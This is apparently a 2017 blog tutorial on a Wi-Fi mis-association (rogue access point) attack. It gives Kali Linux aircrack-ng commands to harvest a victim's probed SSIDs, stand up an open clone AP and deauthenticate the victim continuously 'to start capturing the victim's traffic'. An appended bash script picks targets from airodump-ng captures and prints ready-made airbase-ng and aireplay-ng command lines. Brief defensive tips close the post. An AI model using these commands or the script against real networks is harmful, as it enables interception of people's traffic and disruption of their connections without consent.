Sunday 15 January 2017

Mis-Association attack on wireless Networks and how it works


Reference: Ethical Hacking and Penetration with Kali Linux

Reference: Kali Linux: Hacking Tools Introduction



A mis-association attack gets a client computer to connect to your Kali machine by impersonating a wireless network the client has joined before, or by reusing an SSID that is currently available and already has clients on it. Client devices remember the networks they have joined and send probe requests for them whenever they are looking for a connection. For example, if a computer was connected to a WiFi network called “Public-wifi” in the past, that name can be discovered from its probe requests and used to attract the computer to an access point you control.



The steps are as below:
  • Find one of the wireless SSID names that the victim has connected to before, using “airodump-ng” (the Probe column of the station list)
  • Set up a new access point with exactly the same name
  • Send a de-authentication frame to the victim so that it is disconnected from its current AP and tries to reconnect
  • As the SSID you created is already on the victim’s list of known networks, it will connect to your AP
  • You can now start capturing the victim’s traffic!

To achieve this, the commands and steps below are followed on Kali Linux:

  • airmon-ng start wlan0
    • Puts the wireless card into monitor mode. This post uses the interface name mon0 that older airmon-ng releases create; recent releases name it wlan0mon instead, so use whatever name airmon-ng prints
  • airodump-ng mon0
    • In the station list you can see the networks each client is probing for, i.e. APs it has connected to before (the Probe column), e.g. Public-wifi
    • Note: make sure that SSID is not on the current list of APs. If the real network is also on the air the client may prefer it (it already knows that BSSID and the signal is usually stronger). Also, the client will only join your AP silently if it remembers that SSID as an open network; a profile stored as WPA/WPA2 expects the same security type and the matching key
  • airbase-ng --essid “Public-wifi” -c 1 mon0
    • This makes Kali an open access point on channel 1 that clients can authenticate to and associate with (the option is --essid, or -e for short)
  • Set up DHCP and the other settings as per the previous section (Rogue access points)
  • Now the client station will try to connect to your computer, as it has the same SSID in its list of known networks
  • If the client machine is already connected to another WiFi network, start a de-auth attack as below
  • aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0
    • -0 0 sends deauthentication frames continuously, and -a is the BSSID of the AP the victim is currently connected to; add -c with the victim’s MAC to deauth only that client rather than everyone on the AP. This forces the client to reauthenticate, and it can then pick our AP instead
  • Monitor the output of the airbase-ng command to see when the victim connects
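The selection step above (a probed SSID that is not currently on the air, plus the BSSID of the AP the victim is on right now) can be scripted from the CSV that airodump-ng writes with --write. The script below is an added example and not code from the original post or from the aircrack-ng project; it assumes the airodump-ng CSV layout (an AP table whose 14th column is the ESSID, a blank line, then a station table whose 7th and later columns are the probed ESSIDs), the capture it parses is constructed, and the interface name and channel are arguments. It prints the airbase-ng and aireplay-ng command lines rather than running them.

```bash
#!/bin/bash
# Added example, not code from the original post or from aircrack-ng.
# Picks a mis-association target out of an airodump-ng capture and prints the
# airbase-ng / aireplay-ng command lines for it. Assumes the CSV layout that
# `airodump-ng --write <prefix>` produces (<prefix>-01.csv): an AP table whose
# 14th column is the ESSID, a blank line, then a station table whose 7th and
# later columns are the ESSIDs the station probed for.

# Constructed sample capture standing in for <prefix>-01.csv.
SAMPLE_CSV="$(mktemp)"
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
22:AF:3A:5E:22:3D, 2017-01-15 10:00:01, 2017-01-15 10:09:58,  6,  54, WPA2, CCMP, PSK, -41,      312,        0,   0.  0.  0.  0,   9, Home-Wifi,
9C:12:45:00:AB:10, 2017-01-15 10:00:03, 2017-01-15 10:09:50, 11,  54, OPN ,     ,    , -70,      150,        0,   0.  0.  0.  0,  10, Cafe-Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
C4:8E:8F:11:22:33, 2017-01-15 10:00:05, 2017-01-15 10:09:57, -52,       40, 22:AF:3A:5E:22:3D, Public-wifi,Home-Wifi,Cafe-Guest
D8:FC:93:44:55:66, 2017-01-15 10:01:00, 2017-01-15 10:09:30, -80,        3, (not associated), Cafe-Guest
EOF

# SSIDs a station probes for that no visible AP is currently broadcasting,
# one per line. This is the "make sure that SSID is not on the current list
# of APs" check: those are the names a rogue AP can claim without competing
# with the real network.
candidate_ssids() {
  awk -F',' '
    function trim(x) { gsub(/^ +| +$/, "", x); return x }
    /^BSSID, First time seen/ { section = "ap"; next }
    /^Station MAC/            { section = "st"; next }
    section == "ap" && NF >= 14 { s = trim($14); if (s != "") seen[s] = 1 }
    section == "st" && trim($1) == mac {
      for (i = 7; i <= NF; i++) {
        s = trim($i)
        if (s != "" && !(s in seen) && !(s in out)) { out[s] = 1; print s }
      }
    }' mac="$2" "$1"
}

# BSSID of the AP the station is associated with right now (empty if it is
# not associated). This is the value for aireplay-ng -a.
current_bssid() {
  awk -F',' '
    function trim(x) { gsub(/^ +| +$/, "", x); return x }
    /^Station MAC/ { st = 1; next }
    st && trim($1) == mac { b = trim($6); if (b != "(not associated)") print b }
  ' mac="$2" "$1"
}

# Print the commands for one target station without executing them.
# Arguments: csv, station MAC, monitor interface (mon0 in the post, wlan0mon
# on recent airmon-ng), channel for the rogue AP.
attack_plan() {
  local csv="$1" mac="$2" mon="${3:-mon0}" chan="${4:-1}"
  local ssid bssid
  ssid="$(candidate_ssids "$csv" "$mac" | head -n 1)"
  bssid="$(current_bssid "$csv" "$mac")"
  if [ -z "$ssid" ]; then
    echo "no probed SSID for $mac that is off the air; nothing to impersonate" >&2
    return 1
  fi
  echo "airbase-ng --essid \"$ssid\" -c $chan $mon"
  if [ -n "$bssid" ]; then
    # Deauth only this client (-c) from its current AP (-a) so it roams.
    echo "aireplay-ng -0 0 -a $bssid -c $mac $mon"
  else
    echo "# station is not associated: no deauth needed, wait for it to probe and join"
  fi
}

# Stand-alone demo against the constructed capture.
attack_plan "$SAMPLE_CSV" C4:8E:8F:11:22:33 mon0 1
```

The second station in the sample probes only for Cafe-Guest, which is on the air, so attack_plan refuses it: an SSID that is being broadcast by the real AP gets you a plain evil-twin contest rather than a clean mis-association, and if the real network is WPA-protected the client will not accept an open clone anyway.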

Security Tips:

  • Do NOT connect to any public wireless network unless you are certain it is the one you expect.
  • Forget public and open networks once you are done with them, and turn off auto-join for them, so your device stops probing for and silently rejoining those SSIDs; a remembered open network is exactly what this attack relies on.
  • If you are on a public network, do NOT send any sensitive information over clear text (http, ftp, etc.).
  • If you are on a public network, watch for certificate error messages and do not click through them; a rogue AP sits between you and every site you visit.
  • Use a VPN if you need to use public networks.
